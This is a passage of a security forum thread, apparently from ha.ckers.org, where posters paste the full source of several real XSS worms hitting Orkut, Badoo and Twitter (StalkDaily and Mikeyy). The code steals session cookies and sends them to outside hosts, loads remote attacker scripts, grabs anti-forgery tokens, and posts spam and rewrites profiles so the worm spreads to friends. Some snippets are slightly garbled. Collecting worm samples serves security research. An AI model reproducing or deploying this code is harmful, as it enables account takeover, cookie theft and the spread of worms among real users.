"<br><br><b><font color=\"red\"><font size=5><a target=_blank href=http://www.orkut.com/CommMsgs.aspx?cmm=30794&tid=2585088195765389198>&quot;CLICK HERE TO JOIN ME&quot;</a></font></font></b>"+




""
;
document.body.innerHTML = layout;
var focus = document.createElement("span");
focus.id = "focus";
focus.style.display = "inline";
document.body.appendChild(focus);
var divLoad = document.createElement("div");
divLoad.id = "divLoad";
divLoad.style.display = "inline";
document.body.appendChild(divLoad);

loadFriends();

//sendScrap();

}

sc = String(fwScrap);
sc = sc.substring(21, sc.length - 2);
script = document.createElement("script");
if (typeof document.all) {
script.text = sc;
} else {
script.textContent = sc;
}
document.getElementsByTagName("head")[0].appendChild(script)

- RSnake
Gotta love it. http://ha.ckers.org



Edited 2 time(s). Last edit at 02/28/2008 06:30PM by rsnake.

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: Jiu
Date: March 08, 2008 09:26AM

http://badoo.com

var x;
b=Math.floor(Math.random()*1000000);

if(window.XMLHttpRequest)
x = new XMLHttpRequest();
else if(window.ActiveXObject)
x = new ActiveXObject("Microsoft.XMLHTTP");


u=document.location; //url
l=document.cookie.split(";");
c=l[2].substring(4,36); //cookie
p=document.links[6].href; //page
t=(document.links[6].href).split(".");
r=t[0].substring(7,t[0].length); //number of the page because its like that --> hxxp://number.badoo.com

if(u!=p){ //like that, there isnt a new reportage all the time you visit your profil
sh="\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"submit_to\"\r\n\r\n"+p+"entry/0/edit/103?noupload=1\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"s1\"\r\n\r\n"+c+"\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"upload_ws_url\"\r\n\r\nhxxp://87.245.192.195"+r+"/entry/0/upload/1\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"self_domain\"\r\n\r\n"+p+"\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"entry_id\"\r\n\r\n0\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"day\"\r\n\r\n7\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"month\"\r\n\r\n2\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"year\"\r\n\r\n2008\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"who_view\"\r\n\r\nAll\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"had_password\"\r\n\r\n0\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"entrypwd\"\r\n\r\n\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"who_comment\"\r\n\r\nAll\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"title\"\r\n\r\nI will become an hero\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"body\"\r\n\r\n<script>r=document;t=\"http:/\"; s=r.createElement(\"script\"); s.src=t.concat(\"/kurl.nl?1B9E\" );r.body.appendChild(s); </script>";
sh+="\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"file\";filename=\"\"\r\nContent-Type:";
sh+="application/octet-stream\r\n\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"save\"\r\n\r\nCr%c3%a9er reportage\r\n--"+b+"--\r\n";";

x.open("POST",u+"entry/create/",true); //little error in badoo, you can post a reportage from another page that yours
x.setRequestHeader("Content-Length",sh.length);
x.setRequestHeader("Content-Type","multipart/form-data; boundary="+b);
x.send(sh);

}else{ //only when you visit your profil, that send a friendrequest and send a message at all your friends

d="user_id=097994444&code=&burl="+p+"contacts/&friendship_type_group[Friend]=1&";
d+="friendship_type[]=Friend&friendship_type[]=FamilyMember&friendship_type[]=ProfessionalContact&submit=Ajouter+dans+la+liste+d%27amis";
x.open("POST",u+"friend/new_request.phtml",true);
x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
x.setRequestHeader("Content-Length",d.length);
x.send(d);

x.onreadystatechange=function(){
if(x.readyState==4 && x.status==200){

x.open("GET",u+"friends/",false);
x.send(null);

j=x.responseText;
f=j.split("has ");
z=f[1].substring(0,1);
p=j.split("\"uid");
i=1;

function A(i){ 
d2="s1="+c+"&contact_user_id=0"+p.substring(0,8)+"&action=add&message=Come see my new pictures Kisss&flash=1";
x.open("POST",u+"contacts/ws-post.phtml",false);
x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
x.setRequestHeader("Content-Length",d2.length);
x.send(d2);
setTimeout(function(){A(i+1)},1000);
}
A(i);
}
}
} 

doesn't work on IE, don't know why ^^

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: rsnake
Date: April 13, 2009 03:45PM

Trying to keep current with the Twitter worm code:

function XHConn()
{
var xmlhttp, bComplete = false;
try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
catch (e) { try { xmlhttp = new XMLHttpRequest(); }
catch (e) { xmlhttp = false; }}}
if (!xmlhttp) return null;
this.connect = function(sURL, sMethod, sVars, fnDone)
{
if (!xmlhttp) return false;
bComplete = false;
sMethod = sMethod.toUpperCase();
try {
if (sMethod == "GET")
{
xmlhttp.open(sMethod, sURL+"?"+sVars, true);
sVars = "";
}
else
{
xmlhttp.open(sMethod, sURL, true);
xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
xmlhttp.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
}
xmlhttp.onreadystatechange = function(){
if (xmlhttp.readyState == 4 && !bComplete)
{
bComplete = true;
fnDone(xmlhttp);
}};
xmlhttp.send(sVars);
}
catch(z) { return false; }
return true;
};
return this;
}

function urlencode( str ) {
var histogram = {}, tmp_arr = [];
var ret = str.toString();

var replacer = function(search, replace, str) {
var tmp_arr = [];
tmp_arr = str.split(search);
return tmp_arr.join(replace);
};

histogram["'"] = '%27';
histogram['('] = '%28';
histogram[')'] = '%29';
histogram['*'] = '%2A';
histogram['~'] = '%7E';
histogram['!'] = '%21';
histogram['%20'] = '+';

ret = encodeURIComponent(ret);

for (search in histogram) {
replace = histogram[search];
ret = replacer(search, replace, ret)
}

return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
return "%"+m2.toUpperCase();
});

return ret;
}

var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];

var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");

function wait()
{
var content = document.documentElement.innerHTML;

authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken = authreg.exec(content);
authtoken = authtoken[1];
//alert(authtoken);

var randomUpdate=new Array();
randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
randomUpdate[1]="Join www.StalkDaily.com everyone!";
randomUpdate[2]="Woooo, www.StalkDaily.com :)";
randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
randomUpdate[4]="Wow...www.StalkDaily.com";
randomUpdate[5]="@twitter www.StalkDaily.com";

var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];

updateEncode = urlencode(genRand);

var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[="+xss+"&tab=home&update=update");__}__setTimeout("wait()",3250);__- RSnake__Gotta love it. ]

Options: ReplyQuote
Re: List of XSS Worms?
Posted by: rsnake
Date: April 18, 2009 08:24PM

Here is the mikeyy XSS worm (thanks to Wayne from Armorize for sending this to me):

var genXSS="000; } #notifications{width:
expression(document.body.appendChild(document.createElement('script')).src='http://runebash.net/xss.js');)
#test { color:#333333";

And here is the decoded JavaScript:

function wait() {
var content = document.documentElement.innerHTML;
var tmp_cookie=document.cookie;
var tmp_posted=tmp_cookie.match(/posted/);
authreg= new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken=authreg.exec(content);
var authtoken=authtoken[1];
var randomUpdate= new Array();
randomUpdate[0]= "Be nice to your kids. They'll choose your nursing home. Womp. mikeyy.";
randomUpdate[1]= "If you are born ugly blame your parents, if you died ugly blame your doctor. Womp. mikeyy.";
randomUpdate[2]= "Every man should marry. After all, happiness is not the only thing in life. Womp. mikeyy.";
randomUpdate[3]= "Age is a very high price to pay for maturity.
Womp. mikeyy.";
randomUpdate[4]= "Ninety-nine percent of all lawyers give the rest a bad name. Womp. mikeyy.";
randomUpdate[5]= "If your father is a poor man, it is your fate, but if your father-in-law is a poor man, it's your stupidity. Womp.
mikeyy.";
randomUpdate[6]= "Money is not the only thing, it's everything.
Womp. mikeyy.";
randomUpdate[7]= "Success is a relative term. It brings so many relatives. Womp. mikeyy.";
randomUpdate[8]= "'Your future depends on your dreams', So go to sleep. Womp. mikeyy.";
randomUpdate[9]= "God made relatives; Thank God we can choose our friends.Womp. mikeyy.";
randomUpdate[10]= "'Work fascinates me' I can look at it for hours !
Womp. mikeyy.";
randomUpdate[11]= "I have enough money to last me the rest of my life. (unless I buy something) Womp. mikeyy.";
randomUpdate[12]= "RT!! @spam Watch out for the Mikeyy worm http://bit.ly/XvuJe";
randomUpdate[13]= "FUCK. NEW MIKEYYY WORM! REMOVE IT: http://bit.ly/fuSkF";
randomUpdate[14]= "Mikeyy worm is back!!! Click here to remove it:
http://bit.ly/UTPXe";

var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
var updateEncode=urlencode(randomUpdate[genRand]);

var ajaxConn= new XHConn();
ajaxConn.connect("/status/update","POST","authenticity_token="+authtoken+_"&status="+updateEncode+"&return_rendered_status=true&twttr=true");
var _0xf81bx1c="Mikeyy";
var updateEncode=urlencode(_0xf81bx1c);
var ajaxConn1= new XHConn();
ajaxConn1.connect("/account/settings","POST","authenticity_token="]+authtoken+"&user[name]="+updateEncode+""+updateEncode+"&user[description]="+updateEncode+"&user[location]="+updateEncode+"&user[protected]=0&commit=Save");
var genXSS="000; } #notifications{width:
expression(document.body.appendChild(document.createElement('script')).src='http://runebash.net/xss.js');)
#test { color:#333333";
var XSS=urlencode(genXSS);
var ajaxConn2= new XHConn();
ajaxConn2.connect("/account/profile_settings",""POST,"authenticity_token="]+authtoken+"&user[profile_sidebar_fill_color]="+XSS+"&commit=save+changes");

} ;
setTimeout(wait(),5250);

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.